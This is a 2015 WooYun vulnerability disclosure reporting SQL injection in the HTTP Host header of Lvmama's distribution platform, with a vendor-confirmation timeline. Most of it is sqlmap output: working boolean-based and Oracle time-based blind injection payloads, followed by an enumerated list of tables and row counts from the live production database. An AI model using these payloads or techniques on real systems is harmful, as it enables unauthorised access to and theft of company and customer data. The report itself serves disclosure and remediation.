乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-06: 细节已通知厂商并且等待厂商处理中 2015-07-06: 厂商已经确认,细节仅向厂商公开 2015-07-16: 细节向核心白帽子及相关领域专家公开 2015-07-26: 细节向普通白帽子公开 2015-08-05: 细节向实习白帽子公开 2015-08-20: 细节向公众公开
驴妈妈某重要平台HTTP头存在SQL注入漏洞
http://fenxiao.lvmama.com/
GET / HTTP/1.1Host: fenxiao.lvmama.com*User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://fenxiao.lvmama.com/home/index.jspCookie: JSESSIONID=eS5SEMyyrredConnection: keep-alive
Host参数19个库:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: Host (Host) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: fenxiao.lvmama.com' AND 4081=4081 AND 'UwgJ'='UwgJ Type: AND/OR time-based blind Title: Oracle OR time-based blind Payload: -5437' OR 5236=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(117)||CHR(68)||CHR(106),5) AND 'CZop'='CZop---web application technology: Apacheback-end DBMS: OracleDatabase: SAAS0+-----------------------------+---------+| Table | Entries |+-----------------------------+---------+| MLOG$_B2B_TICKET_DETAIL | 794489 || MLOG$_ROOM_INFO | 739820 || SYS_SMS_LOG | 632524 || MLOG$_INFO_NEWS | 599452 || MLOG$_INFO_TICKET_PRICE | 513239 || SITE_IP2 | 403384 || MLOG$_INFO_TICKET_RELVIEW | 371299 || MLOG$_INFO_HOTEL | 297430 || USR_ENTERPRISE_TAG | 279279 || MLOG$_SAAS_USER_INFO1 | 250810 || SAAS_VIEW_SUB | 220785 || CRUEL_CODE_LOG | 211624 || USR_VIEW_MSG | 197004 || CUST_BALANCE_LOG | 174868 || ROOM_INFO | 149771 || INFO_BANK_TMP | 126068 || INFO_BANK | 117283 || MLOG$_USR_VIEW | 102701 || MLOG$_INFO_TICKET_COND | 94586 || USR_VIEW | 85337 || INTERFACE_HOTEL_SET | 68054 || INTERFACE_QUNAR_LOG | 67402 || USR_VIEW_COPY | 65389 || CRUEL_CODE_LIST | 62173 || INTERFACE_IMAGECO | 61732 || CRUEL_CODE_MESSAGE | 61445 || HOTEL_INFO | 60710 || MLOG$_INFO_TICKET_DETAIL | 54829 || T_LANDMARK | 51918 || INTERFACE_FZG_HOTEL | 35793 || T_VENUE_SUB | 27718 || JP_INFO_FLIGHT | 25133 || T_VENUE | 24033 || EXPCODE_DETAIL | 23496 || INTERFACE_SUPPLY_SYNC_LOG | 17963 || CRUEL_CODE_VERIFY | 14197 || MLOG$_SAAS_USER_INFO | 13659 || MLOG$_USR_VIEW1 | 12552 || MLOG$_INFO_TRAVEL | 12419 || MLOG$_INFO_TICKET_RELAREA | 12241 || TB_RECEIVE_LOG | 12138 || BANK_CITYCODE | 11293 || AUDIT_INFO | 10611 || SAAS_PAY_DRAWMONEY | 8870 || TB_CONSUME_CODE | 8680 || INFO_AREA | 8416 || INFO_AREA_EX | 8389 || INTERFACE_HOTEL | 8256 || INFO_CAR_TYPE | 7354 || MLOG$_INFO_CONDS | 7249 || SAAS_USER_INFO_LOG | 5012 || INTERFACE_LONG | 4900 || USR_VIEW_COLUMN | 4780 || USR_MSG | 4164 || T_REGIONS_QD | 3891 || TEMP_LTJL_AREA_INFO | 3469 || ALITRIP_COUNTRY | 3330 || TEMP_SYR_AREA_INFO | 3252 || T_REGIONS | 3207 || INTERFACE_QUNAR_MOVE | 2666 || HOTEL_DISTRICT | 2598 || SAAS_VAP_ORDER | 2571 || MLOG$_INFO_CAR | 2500 || SAAS_PAY_DRAWMONEY_LOG | 2480 || MLOG$_TB_USR_INFO1 | 2450 || SAAS_INFO_AREA | 2247 || USR_VIEW_LINK | 2191 || INTERFACE_FZG_BIZZONE | 1999 || MLOG$_INFO_VISA | 1782 || ALITRIP_ROOMTYPE222 | 1189 || RECE_PAYMENT_LIST | 1018 || TB_USR_INFO | 1007 || JP_INFO_AIRPORT | 940 || SAAS_ORDER_CHANNEL | 939 || USR_VIEW_MSG_HIS | 935 || T_REGIONS_SUBWAY | 928 || INFO_VISA_SORT | 874 || INTERFACE_LLK_CODE | 843 || SAAS_USER_INFO | 843 || MLOG$_HOTEL_INFO1 | 773 || USR_VIEW_NAV | 752 || B2C_TAOBAO_LOG | 515 || T_VENUE_COUNT | 497 || INTERFACE_MTS_LOG | 468 || ONLINE_DEBUG_LOG | 457 || USR_VIEW_PAGE | 441 || INTERFACE_USER_SET | 434 || MLOG$_INFO_TICKET_CANCEL | 351 || SAAS_PERMISSION | 346 || INTERFACE_USER_SET_LOG | 316 || SAAS_BUY_LOG | 313 || INTERFACE_LUOHUSHAN_LOG | 310 || SAAS_AREA_SUB | 307 || USR_PAGES | 303 || ALITRIP_HOTEL222 | 294 || WX_SET | 269 || INTERFACE_QUNAR_HOTEL_LOG | 229 || JP_INFO_AIRWAYS | 221 || T_SPORTTYPE | 213 || USR_TAG | 202 || MLOG$_HOTEL_DISTRICT1 | 199 || SAAS_INFO_SUB | 179 || SAAS_PAY_SET | 171 || CUST_INFO_GROUP_CHANNEL | 128 || SAAS_NEWS | 121 || SAAS_SERVICE_ADD_LOG | 116 || SYS_MENU | 113 || CRUEL_CODE_POS | 103 || INTERFACE_QUNAR | 100 || HOTEL_BRAND | 97 || SMSINTERFACE_SET_LOG | 94 || TB_VIEW_INFO | 89 || INTERFACE_INFO | 86 || EXPCODE_LIST | 82 || B2C_TAOBAO_ORDER | 68 || SAAS_SERVICE | 58 || USR_POWER_AREA | 58 || B2C_TAOBAO_PRODUCT | 54 || UNIONPAY_TRADE_LOG | 49 || B2C_TAOBAO_ORDER_LOG | 40 || SAAS_USER_MEMO | 39 || CRUEL_CODE_CUST | 36 || T_VENUE_RECORD | 35 || INTERFACE_MAP | 33 || SAAS_ORDER_SOURCE | 33 || INTERFACE_TICKET | 32 || USR_LOGIN | 32 || SYS_CURRENCY_RATE | 25 || MLOG$_SAAS_PERMISSION1 | 23 || SMS_CONSUME_LOG | 23 || SAAS_NEWS_SORT | 19 || SAAS_CLUSTER | 17 || CRUEL_EXP_LIST | 15 || INTERFACE_QUNAR_HOTEL | 15 || JP_INFO_PLANE | 15 || INTERFACE_IMAGECO_CUST | 11 || INTERFACE_LLK_CUST | 10 || SAAS_PAY_SERVICE | 10 || USR_VIEW_TEMPLATE | 10 || SAAS_PAY_PRODUCT_TYPE | 9 || SMSINTERFACE_INFO | 9 || SAAS_VAP_PRODUCT | 8 || SMSINTERFACE_USER_SET | 8 || B2C_TAOBAO_NOTIFYRECEIVEMSG | 7 || INTERFACE_MEITUAN | 7 || MLOG$_INTERFACE_LLK_CUST | 7 || MLOG$_USR_ENTERPRISE_TAG | 7 || SAAS_PROD_TYPE | 6 || SAAS_TABLE_SQL | 6 || SAAS_AGENT_INFO | 5 || SMS_GETMONEY_LOG | 5 || USR_INFO | 5 || BAIDU_TICKET_INFO | 4 || INTERFACE_MTS | 4 || WX_TEMP_INFO | 4 || B2B_SETTLE_METHOD | 3 || INTERFACE_PIAOGJ | 3 || SAAS_MESSAGE_ADDIN | 3 || SAAS_MESSAGE_RSS | 3 || B2C_TAOBAO_CONFIG | 2 || BAIDU_TICKET_VIEW | 2 || CRUEL_EXP_CODE | 2 || SAAS_NOTICE | 2 || TMP_USR_VIEW | 2 || UNIONPAY_CONFIG | 2 || INTERFACE_PRICE_RULE | 1 || MLOG$_INFO_PROD | 1 || SAAS_MONITORING | 1 || T_VENUE_PRICE | 1 |+-----------------------------+---------+
不深入了~
危害等级:高
漏洞Rank:20
确认时间:2015-07-06 13:03
谢谢
暂无